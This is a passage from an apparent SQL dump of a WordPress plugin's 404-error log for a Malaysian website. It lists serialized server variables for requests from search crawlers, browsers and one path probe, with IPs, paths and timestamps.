Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"58344\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaE8VS@o9FnUGZd3w70hdwAAAEA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:12:\"1570847829.6\";s:12:\"REQUEST_TIME\";s:10:\"1570847829\";}}','notice','2019-10-12 02:37:11','2019-10-12 02:37:09',35027888,36837752,'https://bintara.com.my/?page_id=18',1,0,'137.74.4.69'),(27930,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/?page_id=131\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:160:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,text/html,application/xhtml+xml,application/signed-exchange;v=b3,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:15:\"gzip,deflate,br\";s:24:\"HTTP_AMP_CACHE_TRANSFORM\";s:17:\"google;v=\\\"1..2\\\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_FROM\";s:26:\"googlebot(at)googlebot.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:198:\"Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:11:\"page_id=131\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"66.249.70.14\";s:11:\"REMOTE_PORT\";s:5:\"36893\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaFBsS@o9FnUGZd3w70jcwAAAEI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570849202.211\";s:12:\"REQUEST_TIME\";s:10:\"1570849202\";}}','notice','2019-10-12 03:00:05','2019-10-12 03:00:03',34235656,34592456,'https://bintara.com.my/?page_id=131',1,0,'66.249.70.14'),(27931,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:35:\"/vendor/phpunit/phpunit/phpunit.xsd\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=5ba1022e80eb12a0ebee169d9079dc69\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:68:\"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:21:\"HTTP_X_REQUESTED_WITH\";s:14:\"XMLHttpRequest\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:57:\"https://bintara.com.my/vendor/phpunit/phpunit/phpunit.xsd\";s:19:\"REDIRECT_SCRIPT_URL\";s:35:\"/vendor/phpunit/phpunit/phpunit.xsd\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaFdWLtTKIeEpI47WDpW5wAAAIQ\";s:12:\"REDIRECT_URL\";s:35:\"/vendor/phpunit/phpunit/phpunit.xsd\";s:11:\"REMOTE_ADDR\";s:11:\"45.8.224.65\";s:11:\"REMOTE_PORT\";s:5:\"61784\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:57:\"https://bintara.com.my/vendor/phpunit/phpunit/phpunit.xsd\";s:10:\"SCRIPT_URL\";s:35:\"/vendor/phpunit/phpunit/phpunit.xsd\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaFdWLtTKIeEpI47WDpW5wAAAIQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570856280.5572\";s:12:\"REQUEST_TIME\";s:10:\"1570856280\";}}','notice','2019-10-12 04:58:02','2019-10-12 04:58:00',35023744,36828592,'https://bintara.com.my/vendor/phpunit/phpunit/phpunit.xsd',1,0,'45.8.224.65'),(27932,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:132:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.99\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"74.92.201.65\";s:11:\"REMOTE_PORT\";s:5:\"53329\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaGZxOBk7nWdSYNcyx-iHAAAAMY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570871748.8362\";s:12:\"REQUEST_TIME\";s:10:\"1570871748\";}}','notice','2019-10-12 09:15:50','2019-10-12 09:15:49',35029224,36838896,'https://bintara.com.my/?page_id=18',1,0,'74.92.201.65'),(27933,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:83:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1570879915.1019670963287353515625\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1570879915.1019670963287353515625\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1570879915.1019670963287353515625\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:29:\"/sbin:/usr/sbin:/bin:/usr/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1570879915.1019670963287353515625\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"58628\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1570879915.1019670963287353515625\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaG5q7tTKIeEpI47WDpvgwAAAIw\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaG5q7tTKIeEpI47WDpvgwAAAIw\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"58628\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaG5q7tTKIeEpI47WDpvgwAAAIw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570880824.8592\";s:12:\"REQUEST_TIME\";s:10:\"1570880824\";}}','notice','2019-10-12 11:47:24','2019-10-12 11:47:08',35051544,35303912,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1570879915.1019670963287353515625',1,0,'103.6.198.69'),(27934,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/toughpad-fz-g1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/toughpad-fz-g1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/toughpad-fz-g1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaHIpXABbGZIsZQ0LJ@hEgAAAVA\";s:12:\"REDIRECT_URL\";s:16:\"/toughpad-fz-g1/\";s:11:\"REMOTE_ADDR\";s:12:\"207.46.13.72\";s:11:\"REMOTE_PORT\";s:4:\"1849\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/toughpad-fz-g1/\";s:10:\"SCRIPT_URL\";s:16:\"/toughpad-fz-g1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaHIpXABbGZIsZQ0LJ@hEgAAAVA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570883749.678\";s:12:\"REQUEST_TIME\";s:10:\"1570883749\";}}','notice','2019-10-12 12:35:52','2019-10-12 12:35:50',34395752,36188096,'https://bintara.com.my/toughpad-fz-g1/',1,0,'207.46.13.72'),(27935,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/toughbook-33/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-33/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/toughbook-33/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaHQZh9KJJhTjUgT@Z4BQQAAAZE\";s:12:\"REDIRECT_URL\";s:14:\"/toughbook-33/\";s:11:\"REMOTE_ADDR\";s:12:\"207.46.13.11\";s:11:\"REMOTE_PORT\";s:4:\"1630\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-33/\";s:10:\"SCRIPT_URL\";s:14:\"/toughbook-33/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaHQZh9KJJhTjUgT@Z4BQQAAAZE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570885734.3495\";s:12:\"REQUEST_TIME\";s:10:\"1570885734\";}}','notice','2019-10-12 13:08:56','2019-10-12 13:08:54',33914176,35721848,'https://bintara.com.my/toughbook-33/',1,0,'207.46.13.11'),(27936,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:52:\"/wp-content/plugins/maxbuttons/js/min/front.js?ver=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:138:\"Mozilla/5.0 (Linux; Android 4.1.2; SHV-E250S Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.82 Mobile Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:68:\"https://bintara.com.my/wp-content/plugins/maxbuttons/js/min/front.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:46:\"/wp-content/plugins/maxbuttons/js/min/front.js\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaHRlR9KJJhTjUgT@Z4BcgAAAZE\";s:19:\"REDIRECT_SCRIPT_URI\";s:68:\"https://bintara.com.my/wp-content/plugins/maxbuttons/js/min/front.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:46:\"/wp-content/plugins/maxbuttons/js/min/front.js\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaHRlR9KJJhTjUgT@Z4BcgAAAZE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"220.181.124.72\";s:11:\"REMOTE_PORT\";s:5:\"60502\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:68:\"https://bintara.com.my/wp-content/plugins/maxbuttons/js/min/front.js\";s:10:\"SCRIPT_URL\";s:46:\"/wp-content/plugins/maxbuttons/js/min/front.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaHRlR9KJJhTjUgT@Z4BcgAAAZE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570886037.4856\";s:12:\"REQUEST_TIME\";s:10:\"1570886037\";}}','notice','2019-10-12 13:14:00','2019-10-12 